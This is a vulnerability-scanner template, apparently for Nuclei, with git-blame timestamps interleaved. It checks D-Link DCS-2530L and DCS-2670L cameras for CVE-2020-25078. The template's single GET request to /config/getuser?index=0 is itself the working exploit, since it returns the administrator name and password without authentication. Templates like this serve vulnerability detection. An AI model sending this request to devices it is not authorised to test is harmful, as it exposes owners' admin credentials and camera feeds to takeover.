2021-04-01 03:35:06 +00:00
id : CVE-2020-25078
info :
2022-07-26 13:45:11 +00:00
name : D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure
2021-04-01 03:35:06 +00:00
author : pikpikcu
severity : high
2022-07-26 13:45:11 +00:00
description : D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180
- https://twitter.com/Dogonsecurity/status/1273251236167516161
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-25078
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-25078
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,dlink
2021-04-01 03:35:06 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/config/getuser?index=0"
matchers-condition : and
matchers :
- type : word
words :
- "name="
- "pass="
condition : and
2021-04-01 07:23:55 +00:00
- type : word
words :
- "text/plain"
part : header
2021-04-01 03:35:06 +00:00
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/15